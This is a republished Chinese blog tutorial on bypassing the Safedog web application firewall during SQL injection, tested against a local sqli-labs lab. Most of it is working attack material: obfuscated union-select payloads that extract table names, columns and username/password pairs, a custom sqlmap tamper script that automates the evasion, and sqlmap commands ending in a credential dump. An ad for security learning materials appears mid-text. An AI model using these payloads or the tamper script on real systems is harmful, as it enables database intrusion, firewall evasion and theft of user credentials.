广告位联系
返回顶部
分享到

编写SQLMap的Tamper脚本过狗

MsSql 来源:互联网 作者:佚名 发布时间:2023-02-27 21:48:07 人浏览
摘要

测试环境 最新版某狗 测试方法 安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆 一招鲜吃遍天 注释混淆,其实就是在敏感位置添加垃圾字符注释,常用的

测试环境

最新版某狗

测试方法

安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆

一招鲜吃遍天

注释混淆,其实就是在敏感位置添加垃圾字符注释,常用的垃圾字符有/、!、*、%等

这里再解释一下内联注释,因为后面要用到:

MySQL内联注释: /*!xxxxxxx*/ !后面的语句会当作SQL语句直接执行

但是如果!后面跟着MySQL版本号,那么就会出现两种情况

当!后面接的数据库版本号小于自身版本号,就会将注释中的内容执行当!后面接的数据库版本号大于等于自身版本号,就会当做注释来处理。

帮助网安学习,全套资料S信免费领取:
① 网安学习成长路径思维导图
② 60+网安经典常用工具包
③ 100+SRC分析报告
④ 150+网安攻防实战技术电子书
⑤ 最权威CISSP 认证考试指南+题库
⑥ 超1800页CTF实战技巧手册
⑦ 最新网安大厂面试题合集(含答案)
⑧ APP客户端安全检测指南(安卓+IOS)

数据库版本号以五位数字表示,比如当前环境下数据库版本号表示为:50553

!后面接小于50553的:

执行了select 1;

!后面接大于等于50553的:

执行了 select ;

下面进入正题

bypass

and

and 1=1拦

但是把空格删掉就不拦了

所以,我们认为,and后面不能直接跟空格…

那么如果用其他形式表示空格呢?

前面说了,我们这次只使用注释混淆:

burp,抓包设置

长度5335是被拦截的

长度为899的说明成功绕过

我们选择其中一个作为空格的替代者就好了,这里我们选择/*%*

即: ->/*/*%**/

同理 ,or是一样的:

order by

测试发现还是只要替换order by中间的空格就可以了,所以绕过方法和前面一样:

union select

union select使用之前的垃圾字符替换空格发现不行了:

但是先不急于换方法,再爆破一遍试试:

发现又有很多可以绕过的了。

所以我们再更改一下替换空格的垃圾字符, 这里选/*/!%!/*/

即: ->/*/!%!/*/

获得当前数据库

正常语句:

1

?id=-1 union select 1,database(),3 --+

绕过:

即:()->(/*/!%!/*/)

获取数据库中的表

正常语句:

1

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

绕过:

经过测试发现拦截的是select + from + information_schema的组合

中间加垃圾字符替换空格已经不管用了,我们尝试对关键字进行混淆。

对information_schema进行混淆测试:

首先使用内联注释,发现,这里的版本号不管写啥,都直接被拦。

考虑是检测了select + from + /*! + information_schema的组合

加个换行试试

还是不行…

那既然都换行了,那我们再在换行前加一些垃圾字符:

如果我们直接插入垃圾字符,会当作SQL语句执行,所以前面还需要在垃圾字符前加个注释,可以是 /**/或#或--+

但是经过测试只有 --+好用

有这么多可以绕过的,我们随便选择一个,比如/*%/

这样,最终语句如下:

1

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(table_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.tables*/%20where%20table_schema=database(/*/!%!/*/)--%20+

获取表字段

正常语句:

1

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

绕过语句:

1

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,group_concat(column_name),3/*/!%!/*/from/*/!%!/*//*!00000--+/*%/%0ainformation_schema.columns*/%20where%20table_name=0x7573657273--%20+

获取字段信息

1

?id=-1/*/!%!/*/union/*/!%!/*/select/*/!%!/*/1,/*/!%!/*/group_concat(username,0x2f,password),3/*/!%!/*/from/*/!%!/*/users

成功。

编写tamper

当我们下载了SQLMap,解压后,我们可以找到文件夹【tamper】,该文件夹有很多个Tamper脚本帮助我们绕过一些安全防护:

网上有很多相关脚本的介绍,我就不一一介绍了。

虽然SQLMap提供了这么多的Tamper脚本,但是在实际使用的过程中,网站的安全防护并没有那么简单,可能过滤了许多敏感的字符以及相关的函数。这个时候就需要我们针对目标的防护体系构建相应的Tamper脚本。

Tamper相当于一个加工车间,它会把我们的Payload进行加工之后发往目标网站。

我们随便打开一个Tamper脚本看一下它的结构:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

#apostrophemask.py

 

#!/usr/bin/env python

 

"""

Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)

See the file 'LICENSE' for copying permission

"""

# 导入SQLMap中lib\core\enums中的PRIORITY优先级函数

from lib.core.enums import PRIORITY

# 定义脚本优先级

__priority__ = PRIORITY.LOWEST

 

# 对当前脚本的介绍

def dependencies():

    pass

 

'''

对传进来的payload进行修改并返回

函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。

'''

def tamper(payload, **kwargs):

    """

    Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)

 

    References:

        * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128

        * https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/

        * https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850

        * https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps

 

    >>> tamper("1 AND '1'='1")

    '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

    """

 

    return payload.replace('\'', "%EF%BC%87") if payload else payload

可见Tamper脚本的结构非常简单,其实渗透测试中的主要难点还是如何去绕过WAF。

下面我们针对bypass部分的绕过方法进行编写Tamper脚本,来实现自动化SQL注入:

实际测试的时候发现,sqlmap默认语句中的AS关键字也会被拦截,这里也用同样的方法替换一下就好

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

#!/usr/bin/env python

 

import re

 

from lib.core.settings import UNICODE_ENCODING

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

 

def dependencies():

    pass

 

def tamper(payload, **kwargs):

    if payload:

        payload = payload.replace(" ","/*/!%!/*/")

        payload = payload.replace("()","(/*/!%!/*/)")

        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.SCHEMATA)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.SCHEMATA*/",payload)

        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.TABLES)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.TABLES*/",payload)

        payload = re.sub(r"(?i)(INFORMATION_SCHEMA.COLUMNS)",r"/*!00000--%20/*%/%0aINFORMATION_SCHEMA.COLUMNS*/",payload)

        payload = re.sub(r"(?i)(/AS/)",r"//*!00000--%20/*%/%0aAS*//",payload)       

 

    return payload

测试:

1

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent

1

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent --dbs

1

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security --tables

1

python2 sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users --columns

1

sqlmap.py -u "http://192.168.13.131/sqli-labs/Less-2/?id=1" --tamper "bypassDog.py" --proxy "http://127.0.0.1:8080/" --fresh-queries --random-agent -D security -T users -C username,password --dump --stop 3


版权声明 : 本文内容来源于互联网或用户自行发布贡献,该文观点仅代表原作者本人。本站仅提供信息存储空间服务和不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权, 违法违规的内容, 请发送邮件至2530232025#qq.cn(#换@)举报,一经查实,本站将立刻删除。

您可能感兴趣的文章 :

原文链接 : https://blog.csdn.net/qq_38154820/article/details/129165957
相关文章
  • 使用ChatGPT编写SQL JOIN查询

    使用ChatGPT编写SQL JOIN查询
    通过清晰的示例和解释,本文展示了 ChatGPT 如何简化和简化创建复杂 MySQL 查询的过程,使用户更容易与数据库交互并检索他们需要的数据。
  • 编写SQLMap的Tamper脚本过狗

    编写SQLMap的Tamper脚本过狗
    测试环境 最新版某狗 测试方法 安全狗其实是比较好绕的WAF,绕过方法很多,但这里我们就用一种:注释混淆 一招鲜吃遍天 注释混淆,其实
  • SQL嵌套查询的具体使用

    SQL嵌套查询的具体使用
    嵌套查询又称子查询,有select子查询,where子查询,from子查询,exists子查询。 插入数据 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
  • 关于SQL表中drop table和delete table的区别

    关于SQL表中drop table和delete table的区别
    问题:使用阿里云的maxcompute产品发现有中间表的产生,需要删除。 删表是一个比较危险的操作,这次给了个机会就想尝试下,记得在mysql表
  • 嵌入式SQL的详细介绍

    嵌入式SQL的详细介绍
    嵌入式SQL概述 嵌入式SQL(Embedded SQL) 是应用系统使用编程方式来访问和管理数据库中数据的主要方式之一。 SQL语言有两种使用方式:一种是作
  • sql IDENTITY_INSERT对标识列的作用和使用
    一般情况下,当数据表中,莫一列被设置成了标识列之后,是无法向标识列中手动的去插入标识列的显示值。但是,可以通过设置SET IDENTI
  • SQL多表联合查询时如何采用字段模糊匹配

    SQL多表联合查询时如何采用字段模糊匹配
    背景:由于业务或是其他不描述的原因的问题导致原有存储的数据发生变动,与现有数据有差别,但还是能勉强看明白数据内容。 要求:实
  • 清除SQL Server数据库日志(ldf文件)的方法

    清除SQL Server数据库日志(ldf文件)的方法
    清除SQL Server数据库日志(ldf文件)的几种方法 随着系统运行时间的推移,数据库日志文件会变得越来越大,这时我们需要对日志文件进行备份
  • if exists的用法及说明
    1 判断数据库是否存在 1 2 if exists (select * from sys.databases where name = 数据库名) drop database [数据库名] 2 判断表是否存在 1 2 if exists (select * from
  • SQL Server ISNULL 不生效原因及解决方法
    SQL Server ISNULL 不生效原因 数据库:SQL Server 2008 R2 原始SQL:historyval 字段没有数据显示为NULL,用ISNULL判断为NULL的时候替换为 0.0 1 2 3 4 5 6 SE
  • 本站所有内容来源于互联网或用户自行发布,本站仅提供信息存储空间服务,不拥有版权,不承担法律责任。如有侵犯您的权益,请您联系站长处理!
  • Copyright © 2017-2022 F11.CN All Rights Reserved. F11站长开发者网 版权所有 | 苏ICP备2022031554号-1 | 51LA统计